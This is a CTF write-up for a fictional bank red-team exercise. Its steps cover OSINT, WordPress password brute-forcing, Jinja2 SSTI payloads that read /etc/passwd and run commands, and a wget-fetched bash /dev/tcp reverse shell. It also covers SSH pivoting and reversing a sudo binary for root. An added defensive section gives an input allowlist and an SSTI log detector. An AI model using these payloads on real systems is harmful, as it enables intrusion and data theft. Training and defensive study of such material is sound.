## THEME : THE BANK HEIST

![](https://i.imgur.com/WpdOL86.png)

This was a 48-hour CTF that is held annually in Tanzania. It takes place before the H4K-IT event, which is held a few days after the CTF or sometimes right after it. I am one of the organizers and authors of this CTF. The CTF was based on a realistic red teaming exercise where the end goal was to gain access to the banking company through its systems. The CTF had a total of 8 challenges worth a total of 2800 points. Congratulations to the winners and to everyone who participated :+1:

![](https://i.imgur.com/Rtj56Dr.png)

## CATEGORY : OSINT

#### CHALLENGE NAME : Welcome To The Bank Heist

![](https://i.imgur.com/7Ln2nv8.png)

Downloading the attached image and reading it, we get a link, but since that link has expired the alternative is the link in the description of the challenge:

![](https://i.imgur.com/SjVIGjW.png)

The link redirects you to a Telegram group. Once we join the group and read its description, we get the flag:

![](https://i.imgur.com/TASOhA9.png)

```
flag : h4k-it{here-is-something-for-you}
```

#### CHALLENGE NAME : Employee

![](https://i.imgur.com/GSUDP6j.png)

In the Telegram group we get the second hint, which is an image containing a lead.
![](https://i.imgur.com/SrB6Crv.jpg)

We get the name of the bank as "Bank Of New Africa" (bank-of-new-africa). Moving to LinkedIn and searching `bank-of-new-africa`, we get the bank's page:

![](https://i.imgur.com/G4QVTfW.png)

We see that there is a comment; let's check who liked it:

![](https://i.imgur.com/S4AQB6o.png)

One employee reacted to the comment, so let's have a look at his profile:

![](https://i.imgur.com/8KJdmtZ.png)

The flag and the website of the bank:

```
flag : h4k-it{you-have-come-a-long-way}
```

## CATEGORY : WEB

#### CHALLENGE NAME : Think outside the box

![](https://i.imgur.com/svKxfDF.png)

Having found the bank's website, https://bonatanzania.com, we are now tasked with hacking into it. The website uses WordPress. First we need to know the username that will allow us to log in to the dashboard. I tried enumerating usernames through WordPress, but the system administrator had disabled the REST API, so no username was returned. That does not stop us from getting the username: the RSS feed gives us information about the website, including the build date and the creator.

https://bonatanzania.com/?feed=rss

![](https://i.imgur.com/EPYdgZE.png)

We have our user `brandon`. The next step is bruteforcing the password so we can log in. Using wordlists is a waste of time since the password isn't on any of the known wordlists. With that said, we move on to using cewl to scrape keywords from the website:

```bash
cewl https://bonatanzania.com/ > wordlist.txt
```

After that we use crunch to mutate the keywords with numbers. It takes time, but it is worth it. To save time, I went through the wordlist one word at a time. "I KNOW RIGHT! BORING!"
```bash
crunch 8 8 -t word%%%% -o out.txt
```

Now `out.txt` contains our one-word wordlist (the word followed by four digits), and we bruteforce using wpscan:

![](https://i.imgur.com/HRgOI2L.png)

The password is then retrieved; it took a while on my side, almost 5 minutes:

![](https://i.imgur.com/Hfmtfeh.png)

The password is **BoNA2018**. We now proceed to log in:

![](https://i.imgur.com/oOB7Mbq.png)

Clicking on Pages, we can see one page named Checkpoint:

![](https://i.imgur.com/udKMnfv.png)

Viewing it, we get the flag:

![](https://i.imgur.com/B8aIAxg.png)

```
flag : h4k-it{real-hackers-never-end-here}
```

#### CHALLENGE NAME : IBankingSystem

![](https://i.imgur.com/j9q22RF.png)

To solve this, we first visit `bonatanzania.com` to get the ibanking website, which is linked in the footer of the site.

![](https://i.imgur.com/dfFPtnI.png)

![](https://i.imgur.com/q42c17Q.png)

I ran dirsearch on the website and found `/Admin/Settings`:

![](https://i.imgur.com/X7sI6gu.png)

Opening `/Admin/Settings` we get a lead on `mail-test.bonatanzania.com`. The flag can be found right on the `/Login` page.

![](https://i.imgur.com/YW3gnkn.png)

```
flag : h4k-it{ibanking_l3ts_g000000}
```

#### CHALLENGE NAME : MAIL???

![](https://i.imgur.com/TzagxY9.png)

Visiting `mail-test.bonatanzania.com` we are greeted with a `MAILING SYSTEM`. We also have `/send`, which is used to send an email to a recipient that is unknown to us.

![](https://i.imgur.com/XR0U5ww.png)

Sending the email, I am able to get the flag for the challenge.

![](https://i.imgur.com/axPIGCe.png)

```
flag : h4k-it{mail_about_to_get_hXXked}
```

## CATEGORY : INITIAL FOOTHOLD

#### CHALLENGE NAME : Mail-Root

![](https://i.imgur.com/RAXwuhs.png)

From the mail-test server, we try to inject a malicious payload into the `TESTSERVER` input, starting with SSTI (server-side template injection). We test for SSTI by writing the payload `{{4*4}}`: if the output is `16`, then the input is vulnerable to SSTI.
![](https://i.imgur.com/SMhCu9G.png)

The output of the server is `16`. Moving further, we need to exploit this to get a reverse shell, or at least RCE. With this payload:

```python
{{ request.__class__._load_form_data.__globals__.__builtins__.open("/etc/passwd").read() }}
```

I was able to read `/etc/passwd`:

![](https://i.imgur.com/uOOcGZ3.png)

I move on to RCE using the payload:

```python
{{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("ls").read() }}
```

I am able to execute shell commands:

![](https://i.imgur.com/Ss8BN9e.png)

Next step, reverse shell. I first start a Python web server that hosts my malicious script, and a listener. Then I download the script onto the mail server using the RCE I have, and execute it to trigger the reverse shell.

**HOSTING SERVER & LISTENER**

My malicious script contains the following content:

```bash
root@localhost:~/pew# cat pz
bash -c "bash -i &>/dev/tcp/10.10.10.10/1234 <&1"
```

![](https://i.imgur.com/QMN54Lo.png)

**TARGET MAIL SYSTEM**

I write my payload as:

```python
{{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("wget http://10.10.10.10:8000/pz").read() }}
```

*Replace 10.10.10.10 with your hosting IP.*

When it is sent, you will see the request arrive at your hosting server.

**HOSTING SERVER & LISTENER**

![](https://i.imgur.com/7QJq6zT.png)

It shows that the mail system has just downloaded the file, so our next step is triggering the reverse shell by executing it.

**TARGET MAIL SYSTEM**

I write the payload:

```python
{{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("bash pz").read() }}
```

And that's it! We got a reverse shell!
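Seen from the defender's side, here is an added example (my own code, not part of the original writeup or of the challenge's mail application) covering the two things the chain above calls for: a strict hostname allowlist for the `TESTSERVER` field, so template syntax is rejected before it ever reaches Jinja2, and a small detector that runs over constructed access-log lines and flags the `{{4*4}}` probe and the gadget-chain payloads. The log format, the `/send?TESTSERVER=` request shape and the client IPs are assumptions.

```python
from __future__ import annotations
import re
from urllib.parse import unquote_plus

# Input-side fix for the TESTSERVER field: allow only a hostname (RFC 1123
# labels) with an optional port. The real fix is also to pass the value to the
# template as a variable, never to splice it into the template source string.
_HOSTNAME_RE = re.compile(
    r"(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?(?::\d{1,5})?",
    re.IGNORECASE,
)

def is_valid_server_name(value: str) -> bool:
    return len(value) <= 253 and _HOSTNAME_RE.fullmatch(value) is not None

# Signatures of Jinja2 SSTI probing and of the attribute-walking gadget chains
# that turn a template expression into file reads or command execution.
_SSTI_PATTERNS = [
    (r"\{\{.*?\}\}", "template-expression"),
    (r"\{%.*?%\}", "template-statement"),
    (r"__(class|globals|builtins|mro|subclasses|import)__", "python-gadget"),
    (r"\b(popen|system|subprocess|open)\s*\(", "os-call"),
    (r"\b(wget|curl|bash|nc)\b|/dev/tcp", "post-exploit-tool"),
]

def ssti_indicators(value: str) -> list[str]:
    """Names of every SSTI signature present in one (possibly URL-encoded) value."""
    decoded = unquote_plus(value)  # probes usually arrive URL-encoded
    return [name for pat, name in _SSTI_PATTERNS if re.search(pat, decoded)]

def scan_access_log(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Flag access-log lines whose request target carries SSTI indicators."""
    flagged = []
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if m and (hits := ssti_indicators(m.group(1))):
            flagged.append((line, hits))
    return flagged

# Constructed sample log lines modelled on the mail-test flow (not real data).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2023:10:00:00 +0000] "GET /send?TESTSERVER=smtp.example.test HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2023:10:00:07 +0000] "GET /send?TESTSERVER=%7B%7B4*4%7D%7D HTTP/1.1" 200 498',
    '10.0.0.9 - - [01/Jan/2023:10:00:31 +0000] "GET /send?TESTSERVER=%7B%7Bconfig.__class__.from_envvar.__globals__.__builtins__.__import__(%22os%22).popen(%22ls%22).read()%7D%7D HTTP/1.1" 200 731',
]

if __name__ == "__main__":
    for line, hits in scan_access_log(SAMPLE_LOG):
        print(hits, line[:70])
```

The first sample line (a plain hostname) is not flagged; the probe and the gadget chain are, with the gadget chain matching three signatures at once.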
**HOSTING SERVER & LISTENER**

![](https://i.imgur.com/q72Vl75.png)

Reverse shell received. Now we read an interesting file, `mail.txt`:

![](https://i.imgur.com/4piaTkU.png)

This file contains the flag:

```
flag : h4k-it{pivoting_time}
```

## CATEGORY : PIVOTING

#### CHALLENGE NAME : Something Something Rev

![](https://i.imgur.com/DZuf8In.png)

From what we have just read in `mail.txt`, there are some sort of credentials, though we do not know specifically where they are used to log in. In this case the next step is to read the network and host configuration files, starting with `/etc/hosts`:

![](https://i.imgur.com/OY9iV5x.png)

We can see that we have `share.bonatanzania.com`. If you try opening this on the web it won't respond, because it doesn't exist publicly; it's an internal host. I now try to log in over SSH to share.bonatanzania.com using those creds.

![](https://i.imgur.com/lNxl7hB.png)

Boom! Logged in! The flag is in `pivot.txt`:

![](https://i.imgur.com/v2IZIG2.png)

```
flag : h4k-it{pivoting_is_fun_as_well}
```

## CATEGORY : PRIVILEGE ESCALATION

#### CHALLENGE NAME : Network Owner

![](https://i.imgur.com/hGdmSdA.png)

Now this was my favorite part of the challenge. We first look for the privileges we have on this server as the user `tfarooq`:

![](https://i.imgur.com/hPZYOQW.png)

The user can run `/usr/bin/share` with sudo. Let's see what `/usr/bin/share` does:

![](https://i.imgur.com/ccualS2.png)

It asks for an ID. We are going to have to copy this binary back to our lab so that we can reverse engineer it and understand its logic. Running `scp tfarooq@172.105.98.129:/home/tfarooq/share /path/to/share` will download it to your system. I am going to use radare2 for disassembling. Running the `strings` command, I can see the keyword `UPX` at the end of the binary, meaning that it's packed with UPX, so we have to unpack it to get the clean binary.
![](https://i.imgur.com/9cAMVJk.png)

Running `upx -d share -o share_file` unpacks the binary and writes the clean binary as `share_file`:

![](https://i.imgur.com/9wfyNtd.png)

After running `strings` on the clean binary we get the following output, showing that it's unpacked:

![](https://i.imgur.com/jALR7Nw.png)

Now we proceed with radare2. The command `radare2 -d share_file` loads our binary in radare2, and typing `aaa` sets the analysis level:

![](https://i.imgur.com/cssg2Nn.png)

Running `afl` to list all functions shows a lot of available functions:

![](https://i.imgur.com/iIMnq6L.png)

Let's load up the `main` function with the `pdf @main` command:

![](https://i.imgur.com/TEmXF3q.png)

![](https://i.imgur.com/sePPtIG.png)

Reading the output, we can tell that it takes the ID input and saves it in `var_ch`, then compares it against the bounds 200 and 211. If the input is a number between them, it proceeds to the next call, which takes the user's input:

![](https://i.imgur.com/D31uCng.png)

So we can see that the username input is stored in `var_70h` and the password input is stored in `var_e0h`. A comparison then checks whether the username equals `admin` and the password equals `000111AZC`. If both are correct, it executes the command `sudo su`, giving us full root access.

![](https://i.imgur.com/tN9qeM0.png)

LET'S GIVE IT A GO!

![](https://i.imgur.com/WLMgMoW.png)

Just as we expected! We now have root.

![](https://i.imgur.com/KbEmCHN.png)

```
flag : h4k-it{is_it_done??}
```

And this is the end of all the challenges! 😎

[@tahaafarooq](https://twitter.com/tahaafarooq)

---

![](https://media.tenor.com/-Y2YOay3_JoAAAAC/its-friday-dancing.gif)